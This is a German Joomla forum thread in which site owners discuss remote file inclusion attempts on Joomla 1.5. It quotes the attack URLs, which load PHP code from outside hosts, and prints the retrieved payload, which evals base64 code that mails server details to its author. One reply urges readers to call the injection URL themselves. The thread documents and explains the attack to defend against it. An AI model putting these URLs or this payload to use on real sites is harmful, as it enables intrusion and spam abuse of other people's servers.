+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 12

Thema: Hacker versucht Code einzuschleusen

  1. 15.10.2010 15:46 #1
    0815Andreas
    0815Andreas ist offline
    Neu an Board
    Registriert seit
    02.02.2010
    Beiträge
    45
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Hacker versucht Code einzuschleusen

    Hallo, hab einen dreisten Hackversuch bei der 1.5.20 Version gehabt:

    die URL wurde aufgerufen:
    ...//index.php?option=com_user&mosConfig.absolute.path= http://www.xxxxxxxx.com/bbs/data/board04/1246476516/clx.txt?
    die hier auch:
    ..//index.php?option=com_registration&mosConfig.absolu te.path=http://www.xxxxxxx.com/auction/uploaded/ID-RFI.txt??
    die auch:
    ..//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.xxxxxxx.com/auction/uploaded/myid.jpg?
    Da versucht jemand Code einzuschleusen, hat aber nichts gebracht. Auf dem Frontend stand "nur" Interner Bereich" wenn man die URL aufgerufen hat. Trotzdem, das sieht echt gefährlich aus.
    Das steht in der txt:
    Code:
    <?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "B"."a"."M"."b"."Y"."<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "[SAFEMOD:".$hsafemode."] [Kernel:".$xos."]";
echo "<center><A class=ria href=\"http://".$OS."\">";echo "B"."a"."M"."b"."Y</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("JGNyZWF0b3IgPSBiYXNlNjRfZGVjb2RlKCJZV2x1WnpFNE1rQm5iV0ZwYkM1amIyMD0iKTsgKCRz
YWZlX21vZGUpPygkc2FmZW1vZGU9Ik9OIik6KCRzYWZlbW9kZT0iT0ZGIik7ICRiYXNlPSJodHRw
Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107ICAkbmFt
ZSA9IHBocF91bmFtZSgpOyAkaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7ICRob3N0ID0gZ2V0
aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWydIVFRQ
X0hPU1QnXTsgICRtc2cgPSAiXG5CQVNFOiAkYmFzZVxudW5hbWUgLWE6ICRuYW1lXG5JUDogJGlw
XG5Ib3N0OiAkaG9zdFxuJHB3ZHNcbiI7ICRmcm9tID0iRnJvbTogTU9ERV89Ii4kc2FmZW1vZGUu
Ijx0b29sQCIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiI+IjsgbWFpbCggJGNyZWF0b3IsICRzdWJq
LCAkbXNnLCAkZnJvbSk7"));
die("<center> ByroeNet </center>");
?>
    Mein System:
    PHP erstellt für: Linux infong 2.4 #1 SMP Wed Nov 4 21:12:12 UTC 2009 i686 GNU/Linux
    Datenbankversion: 5.0.91-log
    Datenbankzeichensatz: utf8_general_ci
    PHP-Version: 5.2.14
    Webserver: Apache
    PHP-Anbindung zum Webserver: cgi
    Joomla!-Version: Joomla! 1.5.20 Stable [ senu takaa ] 18-July-2010 18:00 GMT
    Browserkennung: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729)

    Nicht schonwieder.... bitte verschiebt meinen Beitrag nach Joomla 1.5 !!!
    Geändert von SniperSister (15.10.2010 um 16:35 Uhr)
    Zitieren Zitieren
  2. 15.10.2010 15:51 #2
    tglaser
    tglaser ist offline
    Kommt häufiger vorbei
    Registriert seit
    30.12.2005
    Ort
    Beerfelden
    Beiträge
    320
    Bedankte sich
    18
    Erhielt 63 Danksagungen
    in 60 Beiträgen

    Standard

    Zitat Zitat von 0815Andreas Beitrag anzeigen
    Hallo, hab einen dreisten Hackversuch bei der 1.5.20 Version gehabt:

    die URL wurde aufgerufen:
    ...//index.php?option=com_user&mosConfig.absolute.path= http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt?
    Hi, dann würde ich mal den 1.5.21 Update machen.
    Grüße aus dem Odenwald
    Thomas
    Joomla 1.5.25 und bald auch 2.5.4
    www.dblt.de - www.bonarei.eu
    Zitieren Zitieren
  3. 15.10.2010 15:52 #3
    0815Andreas
    0815Andreas ist offline
    Neu an Board
    Registriert seit
    02.02.2010
    Beiträge
    45
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hack funktioniert auch in der 1.5.21.
    Ich glaube es scheitert an den Schreibrechten.
    Zitieren Zitieren
  4. 15.10.2010 15:53 #4
    Joomla-Hilfe
    Joomla-Hilfe ist offline
    Wohnt hier Avatar von Joomla-Hilfe
    Registriert seit
    12.08.2010
    Beiträge
    3.668
    Bedankte sich
    78
    Erhielt 1.094 Danksagungen
    in 874 Beiträgen

    Standard

    Zitat Zitat von 0815Andreas Beitrag anzeigen
    Hallo, hab einen dreisten Hackversuch bei der 1.5.20 Version gehabt:
    Nur einen? Von der Sorte hält mir Bot Trap jeden Tag ein Dutzend vom Hals.
    Danke?

    Keine Macht den Facebutts!
    "Dinner for one ist jeden Tag" oder "Und täglich grüßt das Murmeltier"
    Zitieren Zitieren
  5. 15.10.2010 18:09 #5
    Skodi
    Skodi ist offline
    War schon öfter hier
    Registriert seit
    30.01.2006
    Beiträge
    233
    Bedankte sich
    30
    Erhielt 38 Danksagungen
    in 30 Beiträgen

    Standard

    Zitat Zitat von Joomla-Hilfe Beitrag anzeigen
    Nur einen? Von der Sorte hält mir Bot Trap jeden Tag ein Dutzend vom Hals.
    Da er schreibt:
    Das steht in der txt:
    gehe ich davon aus, dass sich die *.txt auf seinem Server befindet !?

    Falls das so ist, war die Remote File Inclusion erfolgreich - das Leck sollte daher meiner Meinung nach geschlossen werden. Wenn es tatsächlich an den Schreibrechten liegt, dann solltest du die schnellstens ändern, denn wenn diese txt-Datei in einem vom Web aus aufrufbaren Ordner liegt / bzw. hochgeladen wird... wirds eng. Der base64 codierte Quelltext lässt nichts gutes ahnen...
    Zitieren Zitieren
  6. 15.10.2010 18:33 #6
    Joomla-Hilfe
    Joomla-Hilfe ist offline
    Wohnt hier Avatar von Joomla-Hilfe
    Registriert seit
    12.08.2010
    Beiträge
    3.668
    Bedankte sich
    78
    Erhielt 1.094 Danksagungen
    in 874 Beiträgen

    Standard

    Zitat Zitat von Skodi Beitrag anzeigen
    Da er schreibt:

    gehe ich davon aus, dass sich die *.txt auf seinem Server befindet !?
    Nein, die befindet sich bei diesen Aufrufen immer auf einem anderen, bereits infizierten Rechner. Die attackierten Rechner dienen nur als "Strohmänner", um den dort eingeschleusten Code auszuführen und Spam zu verschicken. Wenn das der infizierte Server selbst machen würde, würde er zu schnell auffallen und vom Netz genommen.

    So gesehen ist hier es also kein Hackversuch, sondern "nur" ein Mißbrauch der Mailfunktion für Spam.
    Danke?

    Keine Macht den Facebutts!
    "Dinner for one ist jeden Tag" oder "Und täglich grüßt das Murmeltier"
    Zitieren Zitieren
  7. 15.10.2010 18:37 #7
    vsven
    vsven ist offline
    Kommt häufiger vorbei
    Registriert seit
    04.01.2007
    Beiträge
    417
    Bedankte sich
    27
    Erhielt 81 Danksagungen
    in 80 Beiträgen

    Standard

    Zitat Zitat von Skodi Beitrag anzeigen
    Da er schreibt:

    gehe ich davon aus, dass sich die *.txt auf seinem Server befindet !?
    Nein, er hat den Code der *txt Datei auf dem fremden "gehackten" Server ausgelesen. Diesen wollte jemand einzuschleusen.

    !!! nicht hier klicken !!!

    Zitieren Zitieren
  8. 15.10.2010 18:39 #8
    Skodi
    Skodi ist offline
    War schon öfter hier
    Registriert seit
    30.01.2006
    Beiträge
    233
    Bedankte sich
    30
    Erhielt 38 Danksagungen
    in 30 Beiträgen

    Standard

    Zitat Zitat von Joomla-Hilfe Beitrag anzeigen
    Nein, die befindet sich bei diesen Aufrufen immer auf einem anderen, bereits infizierten Rechner. Die attackierten Rechner dienen nur als "Strohmänner", um den dort eingeschleusten Code auszuführen und Spam zu verschicken. Wenn das der infizierte Server selbst machen würde, würde er zu schnell auffallen und vom Netz genommen.

    So gesehen ist hier es also kein Hackversuch, sondern "nur" ein Mißbrauch der Mailfunktion für Spam.
    Ja Ja, schon klar

    Ich frage mich nur, wie er den Inhalt der *.txt sehen kann - und gleichzeitig schreibt , wenn man sie aufruft kommt "Interner Bereich" ... das passt für einen fremden Webspace doch irgendwie nicht zusammen... oder?
    Zitieren Zitieren
  9. 15.10.2010 18:44 #9
    Joomla-Hilfe
    Joomla-Hilfe ist offline
    Wohnt hier Avatar von Joomla-Hilfe
    Registriert seit
    12.08.2010
    Beiträge
    3.668
    Bedankte sich
    78
    Erhielt 1.094 Danksagungen
    in 874 Beiträgen

    Standard

    Zitat Zitat von Skodi Beitrag anzeigen
    Ich frage mich nur, wie er den Inhalt der *.txt sehen kann
    Indem er sie von dem Server runterlädt.

    und gleichzeitig schreibt , wenn man sie aufruft kommt "Interner Bereich"
    Um so ein Zeug auch noch auszuführen, muß man allerdings... öhm... etwas blauäugig sein.
    Danke?

    Keine Macht den Facebutts!
    "Dinner for one ist jeden Tag" oder "Und täglich grüßt das Murmeltier"
    Zitieren Zitieren
  10. 15.10.2010 18:47 #10
    vsven
    vsven ist offline
    Kommt häufiger vorbei
    Registriert seit
    04.01.2007
    Beiträge
    417
    Bedankte sich
    27
    Erhielt 81 Danksagungen
    in 80 Beiträgen

    Standard

    Zitat Zitat von Skodi Beitrag anzeigen
    Ich frage mich nur, wie er den Inhalt der *.txt sehen kann
    Rufe: http://www.xxxxxxxx.com/bbs/data/boa...476516/clx.txt ab. Dann siehst Du den Inhalt.

    Zitat Zitat von Skodi Beitrag anzeigen
    - und gleichzeitig schreibt , wenn man sie aufruft kommt "Interner Bereich" ... das passt für einen fremden Webspace doch irgendwie nicht zusammen... oder?
    Rufe alles zusammen auf: http://www.xxxxxxxx.xxx/index.php?op...absolute.path= http://www.xxxxxxxx.com/bbs/data/boa...76516/clx.txt?
    Dann siehst Du was passiert, ganz einfach.

    Zitat Zitat von Joomla-Hilfe Beitrag anzeigen
    Um so ein Zeug auch noch auszuführen, muß man allerdings... öhm... etwas blauäugig sein.
    In dem Fall eh zu spät, und testenswert.

    !!! nicht hier klicken !!!

    Zitieren Zitieren
+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
« Vorheriges Thema | Nächstes Thema »

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein

Foren-Regeln